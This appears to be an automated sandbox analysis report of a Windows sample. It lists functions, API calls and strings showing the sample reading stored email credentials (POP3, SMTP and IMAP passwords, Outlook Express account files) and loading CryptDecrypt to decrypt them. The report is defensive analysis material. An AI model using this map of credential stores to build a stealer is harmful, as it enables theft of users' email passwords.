Opcode Fuzzy Hash: c906e694df2f1e329c2ad0273a3b26fae1964e0f17262c21461e5f274a22aefa
Instruction Fuzzy Hash: CE216271618111DFD35CEB39D8C1A66B3A9FF04314B15427FF41AA7282C738EC118B89

Uniqueness

Uniqueness Score: -1.00%

Function 0040472F, Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?), ref: 00404795

LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
GetProcAddress.KERNEL32(00000000,?), ref: 0040474F

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadProc
String ID:
API String ID: 145871493-0
Opcode ID: 34168eeea590afdd6655235be49c2a8b874ed4aa7e418e211b0f862b96c87c84
Instruction ID: 2550b76864eeaa7c500838184e9c491a546ed4ce74a868b02878dd57666eb7ef
Opcode Fuzzy Hash: 34168eeea590afdd6655235be49c2a8b874ed4aa7e418e211b0f862b96c87c84
Instruction Fuzzy Hash: A5F01BF4600B029FD760AF35E848B9B77E5AF86710F00453EF665E3182D778A545CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004103E0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410407

Part of subcall function 004102F8: memset.MSVCRT ref: 00410316
Part of subcall function 004102F8: _itoa.MSVCRT ref: 0041032D
Part of subcall function 004102F8: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0041033C

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: PrivateProfile$StringWrite_itoamemset
String ID:
API String ID: 4165544737-0
Opcode ID: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
Instruction ID: a6fec7de448531cc7e5bdd8bb9ba05dfe42c6da5839e04c605b7484fd2ec2d67
Opcode Fuzzy Hash: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
Instruction Fuzzy Hash: 23E0BD3204060EBFCF125F80EC05AAA7BA6FF04354F24886AFD6804121D77299F0AB99

Uniqueness

Uniqueness Score: -1.00%

Function 00404780, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,?), ref: 00404795

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
Instruction ID: 32a23a6afe1256adb8d295dcdce629e4b632fcbc5e0d618fa027d99050396328
Opcode Fuzzy Hash: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
Instruction Fuzzy Hash: D7D012714003118FDB609F14FD4CBA173E8AF41312F1504B8E994AB192C3749840CA58

Uniqueness

Uniqueness Score: -1.00%

Function 00406AB8, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040AD7B,00000000,00000000,00000000,0044551F,0044551F,?,0040CC56,0044551F), ref: 00406ACA

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
Instruction ID: 174152b0962da7481451d0c07619c80c3ba7c59bd8607505f6d9dddbb6799519
Opcode Fuzzy Hash: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
Instruction Fuzzy Hash: 08C012F06503007FFF204B10AC0AF37369DD780700F1044207E00E40E1C2A14C40C524

Uniqueness

Uniqueness Score: -1.00%

Function 00410166, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,0041019A,?,?,?,?,?,?,004041AC), ref: 00410172

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
Instruction ID: 507e23945262d0460dd2b0da46a8ed0ea94319227dbecdfb5597338915b85de2
Opcode Fuzzy Hash: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
Instruction Fuzzy Hash: 6EC04C35510B019BEB219B22D949753B7E4AB05316F40C81CA59695451D7BCE494CE18

Uniqueness

Uniqueness Score: -1.00%

Function 00410663, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

EnumResourceNamesA.KERNEL32(?,?,004105DD,00000000), ref: 00410672

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
Instruction ID: e40f58546d13f5b106010a29914381b046978f91ca1901c00a2019c551bf0e65
Opcode Fuzzy Hash: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
Instruction Fuzzy Hash: A0C09B31554341A7C701DF108C09F1A7695BB55705F504C297151940A4C7514054DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00407D1F, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?,00407C39,?,?,00000000,.8D,0044373A,*.oeaccount,.8D,?,00000104), ref: 00407D29

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
Instruction ID: e21386352e8edd65572014a1fcaa83e24a75218a268847cd9e3b74dd15e40f0a
Opcode Fuzzy Hash: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
Instruction Fuzzy Hash: 50C092349109018FD62C9F38DC5A52A77A0BF5A3343B40F6CA0F3D20F0E778A842CA08

Uniqueness

Uniqueness Score: -1.00%

Function 00410411, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004107BA,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410424

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
Instruction ID: 9e85f5290c785a84adc9a585aa79e4266a03e2402c05001ad2ac5d5d83fda341
Opcode Fuzzy Hash: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
Instruction Fuzzy Hash: 40C09B39544301BFDE114F40FD05F09BB61BB84F05F504414B244240B182714414EB57

Uniqueness

Uniqueness Score: -1.00%

Function 00406D1F, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,004093E6,?,0040949C,00000000,?,00000000,00000104,?), ref: 00406D23

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
Instruction ID: 1a596b20ff26773e60743876e99a20c5f0c5c53ebb8dbfb842e64d2fd6ed3a7e
Opcode Fuzzy Hash: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
Instruction Fuzzy Hash: 76B012792108005FCF1807349C4904D35506F45631760073CF033C00F0D720CC60BA00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004047C6, Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00404A47,?,?,0040410C,?,?,004041CC), ref: 004047D5
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047E9
GetProcAddress.KERNEL32(0045175C,CryptReleaseContext), ref: 004047F5
GetProcAddress.KERNEL32(0045175C,CryptCreateHash), ref: 00404801
GetProcAddress.KERNEL32(0045175C,CryptGetHashParam), ref: 0040480D
GetProcAddress.KERNEL32(0045175C,CryptHashData), ref: 00404819
GetProcAddress.KERNEL32(0045175C,CryptDestroyHash), ref: 00404825
GetProcAddress.KERNEL32(0045175C,CryptDecrypt), ref: 00404831
GetProcAddress.KERNEL32(0045175C,CryptDeriveKey), ref: 0040483D
GetProcAddress.KERNEL32(0045175C,CryptImportKey), ref: 00404849
GetProcAddress.KERNEL32(0045175C,CryptDestroyKey), ref: 00404855

Strings

advapi32.dll, xrefs: 004047D0
CryptDecrypt, xrefs: 00404827
CryptGetHashParam, xrefs: 00404803
CryptReleaseContext, xrefs: 004047EB
CryptDestroyHash, xrefs: 0040481B
CryptAcquireContextA, xrefs: 004047E1
CryptDeriveKey, xrefs: 00404833
CryptHashData, xrefs: 0040480F
CryptDestroyKey, xrefs: 0040484B
CryptCreateHash, xrefs: 004047F7
CryptImportKey, xrefs: 0040483F

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
API String ID: 2238633743-192783356
Opcode ID: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
Instruction ID: 96d911507a8a1b00aef88e3b883ab5eac538cf63a3166b36270edd586bbeed94
Opcode Fuzzy Hash: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
Instruction Fuzzy Hash: A501C974940744AFDB31AF769C09E06BEF1EFA97003224D2EE2C553650D77AA010DE49

Uniqueness

Uniqueness Score: -1.00%

Function 00402DA5, Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004107BA,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410424

Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,004107E3,?,?,?,?,004107E3,00000000,?,?), ref: 0041046D

Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A

Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B

_mbscpy.MSVCRT ref: 00402EBC
_mbscpy.MSVCRT ref: 00402ECF
_mbscpy.MSVCRT ref: 00402F5C
_mbscpy.MSVCRT ref: 00402F69
RegCloseKey.ADVAPI32(?), ref: 00402FC3

Strings

PopServer, xrefs: 00402E57
PopAccount, xrefs: 00402E41
PopPort, xrefs: 00402E6A
SMTPPassword, xrefs: 00402F36
PopLogSecure, xrefs: 00402E7B
SMTPAccount, xrefs: 00402EDB
PopPassword, xrefs: 00402E96
EmailAddress, xrefs: 00402E2B
DisplayName, xrefs: 00402DFE
SMTPLogSecure, xrefs: 00402F1B
SMTPPort, xrefs: 00402F07
SMTPServer, xrefs: 00402EF1

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscpy$QueryValue$CloseOpen
String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
API String ID: 52435246-1534328989
Opcode ID: 2665cc72ed58d91ff9308ee517590a1cb7b28409f0a8ebbfaa166c67739115e5
Instruction ID: 400a04a5c8efacb9c4641a70875855bf6b7e4888715d32951425251a7c23a99d
Opcode Fuzzy Hash: 2665cc72ed58d91ff9308ee517590a1cb7b28409f0a8ebbfaa166c67739115e5
Instruction Fuzzy Hash: 575130B1900118BBEF11EB51DD41FEE777CAF04754F5080A7BA0CA6192DBB89B858F98

Uniqueness

Uniqueness Score: -1.00%

Function 004033E2, Relevance: 7.6, Strings: 6, Instructions: 61COMMON

Download Yara Rule

Strings

POP3Server, xrefs: 0040345E
POP3Password, xrefs: 00403482
ESMTPPassword, xrefs: 0040344C
POP3Username, xrefs: 00403470
ESMTPUsername, xrefs: 0040343A
SMTPServer, xrefs: 0040341E

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: PrivateProfileString_mbscmpstrlen
String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
API String ID: 3963849919-1658304561
Opcode ID: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
Instruction ID: 1b90a5eb0bf433dfd26fdc49de6d86aad9c02d214cf5b02dd481862667588e5e
Opcode Fuzzy Hash: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
Instruction Fuzzy Hash: EF21F47180151C6EDB51EB11DD82FEE777C9B44705F4004ABBA09B1092DBBC6BC68E59

Uniqueness

Uniqueness Score: -1.00%

Function 004016FC, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

Strings

E, xrefs: 0040171E
E, xrefs: 0040178D
E, xrefs: 0040172B

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ??2@??3@memcpymemset
String ID: E$ E$ E
API String ID: 1865533344-1090515111
Opcode ID: d103da67eb1310c5cb0da91bd2fc58aaf79ad628852ab800fc720c436b93df84
Instruction ID: 87a0be596659d04b7e64c8373dbe8b7d58709088cb568d7826d55e868489c559
Opcode Fuzzy Hash: d103da67eb1310c5cb0da91bd2fc58aaf79ad628852ab800fc720c436b93df84
Instruction Fuzzy Hash: 0E115A74900209EFCF119F90C905AAE3BB1AF08312F00806AFC156B2A2C7799911DFAA

Uniqueness

Uniqueness Score: -1.00%

Function 0044227B, Relevance: 203.3, APIs: 8, Strings: 108, Instructions: 307stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0044269A
_strncoll.MSVCRT ref: 004426AA
memcpy.MSVCRT ref: 00442726
atoi.MSVCRT ref: 00442737
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000), ref: 00442763

Strings

Uuml;, xrefs: 00442516
Oslash;, xrefs: 004424EE
frac14;, xrefs: 004423D6
copy;, xrefs: 00442318
Aring;, xrefs: 00442430
Ntilde;, xrefs: 004424A8
amp;, xrefs: 00442286
Ecirc;, xrefs: 00442462
acute;, xrefs: 00442386
egrave;, xrefs: 0044259B
iuml;, xrefs: 004425E1
aacute;, xrefs: 00442548
sup2;, xrefs: 00442372
, xrefs: 004422C0
oslash;, xrefs: 00442632
AElig;, xrefs: 0044243A
yacute;, xrefs: 00442655
reg;, xrefs: 0044234A
euml;, xrefs: 004425B9
divide;, xrefs: 0044262B
macr;, xrefs: 00442354
Ouml;, xrefs: 004424DA
szlig;, xrefs: 00442534
pound;, xrefs: 004422DC
Aacute;, xrefs: 00442408
ccedil;, xrefs: 00442591
Icirc;, xrefs: 0044248A
THORN;, xrefs: 0044252A
ucirc;, xrefs: 00442647
nbsp;, xrefs: 004422A2
eth;, xrefs: 004425EB
Euml;, xrefs: 0044246C
not;, xrefs: 00442336
iquest;, xrefs: 004423F4
acirc;, xrefs: 00442552
yen;, xrefs: 004422F0
middot;, xrefs: 004423A4
Atilde;, xrefs: 0044241C
iacute;, xrefs: 004425CD
ETH;, xrefs: 0044249E
micro;, xrefs: 00442390
sect;, xrefs: 00442304
uml;, xrefs: 0044230E
', xrefs: 004422C4
Egrave;, xrefs: 0044244E
Iuml;, xrefs: 00442494
thorn;, xrefs: 0044265C
sup1;, xrefs: 004423B8
para;, xrefs: 0044239A
aelig;, xrefs: 00442587
cent;, xrefs: 004422D2
uuml;, xrefs: 0044264E
cedil;, xrefs: 004423AE
ntilde;, xrefs: 004425F5
sup3;, xrefs: 0044237C
", xrefs: 004422BC
apos;, xrefs: 004422A9
igrave;, xrefs: 004425C3
auml;, xrefs: 00442573
agrave;, xrefs: 0044253E
atilde;, xrefs: 0044255C
gt;, xrefs: 00442294
Ocirc;, xrefs: 004424C6
ordf;, xrefs: 00442322
ouml;, xrefs: 00442624
>, xrefs: 004422B8
Uacute;, xrefs: 00442502
brvbar;, xrefs: 004422FA
ordm;, xrefs: 004423C2
deg;, xrefs: 0044235E
&, xrefs: 004422B0
ecirc;, xrefs: 004425AF
uacute;, xrefs: 00442640
oacute;, xrefs: 00442609
laquo;, xrefs: 0044232C
_, xrefs: 004427FE
quot;, xrefs: 0044229B
times;, xrefs: 004424E4
raquo;, xrefs: 004423CC
frac12;, xrefs: 004423E0
Yacute;, xrefs: 00442520
frac34;, xrefs: 004423EA
ugrave;, xrefs: 00442639
Ograve;, xrefs: 004424B2
Agrave;, xrefs: 004423FE
ocirc;, xrefs: 00442613
otilde;, xrefs: 0044261D
icirc;, xrefs: 004425D7
aring;, xrefs: 0044257D
yuml;, xrefs: 00442663
shy;, xrefs: 00442340
Iacute;, xrefs: 00442480
Igrave;, xrefs: 00442476
<, xrefs: 004422B4
Ucirc;, xrefs: 0044250C
ograve;, xrefs: 004425FF
curren;, xrefs: 004422E6
Acirc;, xrefs: 00442412
Ccedil;, xrefs: 00442444
plusmn;, xrefs: 00442368
Otilde;, xrefs: 004424D0
lt;, xrefs: 0044228D
Auml;, xrefs: 00442426
Eacute;, xrefs: 00442458
eacute;, xrefs: 004425A5
Oacute;, xrefs: 004424BC
iexcl;, xrefs: 004422C8
Ugrave;, xrefs: 004424F8

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide_strncollatoimemcpystrlen
String ID: $"$&$'$<$>$AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$_$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
API String ID: 1864335961-2171099893
Opcode ID: e99848a287a3a7b39c76becfde624000b898551de0b61847b1a8922e6b237886
Instruction ID: 53082eb74af2b51306e1b07bdc149dea26fd0daa9c3b29582cc647e8b6ddbc01
Opcode Fuzzy Hash: e99848a287a3a7b39c76becfde624000b898551de0b61847b1a8922e6b237886
Instruction Fuzzy Hash: 90F112B080625CDBFB61CF54D9897DEBBB0EB01308F5881CAD4597B251C7B81A89CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0044227B, Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0044269A
_strncoll.MSVCRT ref: 004426AA
memcpy.MSVCRT ref: 00442726
atoi.MSVCRT ref: 00442737
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00442763

Strings

Oslash;, xrefs: 004424EE
Acirc;, xrefs: 00442412
Yacute;, xrefs: 00442520
egrave;, xrefs: 0044259B
ccedil;, xrefs: 00442591
Otilde;, xrefs: 004424D0
auml;, xrefs: 00442573
cent;, xrefs: 004422D2
ordf;, xrefs: 00442322
uuml;, xrefs: 0044264E
acirc;, xrefs: 00442552
Agrave;, xrefs: 004423FE
aelig;, xrefs: 00442587
euml;, xrefs: 004425B9
plusmn;, xrefs: 00442368
middot;, xrefs: 004423A4
sup2;, xrefs: 00442372
curren;, xrefs: 004422E6
Ograve;, xrefs: 004424B2
para;, xrefs: 0044239A
Eacute;, xrefs: 00442458
Ocirc;, xrefs: 004424C6
Igrave;, xrefs: 00442476
sect;, xrefs: 00442304
ordm;, xrefs: 004423C2
Icirc;, xrefs: 0044248A
iacute;, xrefs: 004425CD
oacute;, xrefs: 00442609
iexcl;, xrefs: 004422C8
Iuml;, xrefs: 00442494
otilde;, xrefs: 0044261D
uacute;, xrefs: 00442640
THORN;, xrefs: 0044252A
agrave;, xrefs: 0044253E
raquo;, xrefs: 004423CC
Uacute;, xrefs: 00442502
atilde;, xrefs: 0044255C
Ecirc;, xrefs: 00442462
szlig;, xrefs: 00442534
pound;, xrefs: 004422DC
ouml;, xrefs: 00442624
deg;, xrefs: 0044235E
amp;, xrefs: 00442286
eth;, xrefs: 004425EB
ETH;, xrefs: 0044249E
Aring;, xrefs: 00442430
cedil;, xrefs: 004423AE
yuml;, xrefs: 00442663
sup1;, xrefs: 004423B8
Euml;, xrefs: 0044246C
Oacute;, xrefs: 004424BC
nbsp;, xrefs: 004422A2
sup3;, xrefs: 0044237C
not;, xrefs: 00442336
Uuml;, xrefs: 00442516
ugrave;, xrefs: 00442639
aacute;, xrefs: 00442548
ucirc;, xrefs: 00442647
frac14;, xrefs: 004423D6
oslash;, xrefs: 00442632
quot;, xrefs: 0044229B
shy;, xrefs: 00442340
lt;, xrefs: 0044228D
ocirc;, xrefs: 00442613
macr;, xrefs: 00442354
Aacute;, xrefs: 00442408
Iacute;, xrefs: 00442480
frac12;, xrefs: 004423E0
aring;, xrefs: 0044257D
yen;, xrefs: 004422F0
brvbar;, xrefs: 004422FA
igrave;, xrefs: 004425C3
uml;, xrefs: 0044230E
Egrave;, xrefs: 0044244E
eacute;, xrefs: 004425A5
times;, xrefs: 004424E4
Ucirc;, xrefs: 0044250C
iuml;, xrefs: 004425E1
yacute;, xrefs: 00442655
gt;, xrefs: 00442294
Atilde;, xrefs: 0044241C
Ccedil;, xrefs: 00442444
AElig;, xrefs: 0044243A
iquest;, xrefs: 004423F4
icirc;, xrefs: 004425D7
divide;, xrefs: 0044262B
copy;, xrefs: 00442318
Ntilde;, xrefs: 004424A8
ecirc;, xrefs: 004425AF
apos;, xrefs: 004422A9
reg;, xrefs: 0044234A
Ugrave;, xrefs: 004424F8
thorn;, xrefs: 0044265C
ograve;, xrefs: 004425FF
Ouml;, xrefs: 004424DA
ntilde;, xrefs: 004425F5
laquo;, xrefs: 0044232C
frac34;, xrefs: 004423EA
acute;, xrefs: 00442386
micro;, xrefs: 00442390
Auml;, xrefs: 00442426

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ByteCharMultiWide_strncollatoimemcpystrlen
String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
API String ID: 1864335961-3210201812
Opcode ID: 9acad2382b4fd50a8b7e2f93e5aa20aeec794c15f10aa330bed035e5ecf7ca78
Instruction ID: 53082eb74af2b51306e1b07bdc149dea26fd0daa9c3b29582cc647e8b6ddbc01
Opcode Fuzzy Hash: 9acad2382b4fd50a8b7e2f93e5aa20aeec794c15f10aa330bed035e5ecf7ca78
Instruction Fuzzy Hash: 90F112B080625CDBFB61CF54D9897DEBBB0EB01308F5881CAD4597B251C7B81A89CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0044315E, Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00443170
strcmp.MSVCRT ref: 004431BC
strcmp.MSVCRT ref: 004431E5
strcmp.MSVCRT ref: 0044320E
strcmp.MSVCRT ref: 00443237
strcmp.MSVCRT ref: 00443260
strcmp.MSVCRT ref: 00443293
strcmp.MSVCRT ref: 004432C6
strcmp.MSVCRT ref: 00443332
strcmp.MSVCRT ref: 00443362
strcmp.MSVCRT ref: 00443392
strcmp.MSVCRT ref: 004433C2
strcmp.MSVCRT ref: 004433EC
strcmp.MSVCRT ref: 00443415
strcmp.MSVCRT ref: 004432F9

Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE

_strcmpi.MSVCRT ref: 00443485
_strcmpi.MSVCRT ref: 00443496
_strcmpi.MSVCRT ref: 004434A7
_strcmpi.MSVCRT ref: 0044345C

Part of subcall function 0040710B: strtoul.MSVCRT ref: 00407113

_strcmpi.MSVCRT ref: 004434D0
_strcmpi.MSVCRT ref: 004434F9
_strcmpi.MSVCRT ref: 0044350A
_strcmpi.MSVCRT ref: 0044351B

Strings

IMAP, xrefs: 00443356
SMTP_Port, xrefs: 00443450
IMAP_Server, xrefs: 004431DF
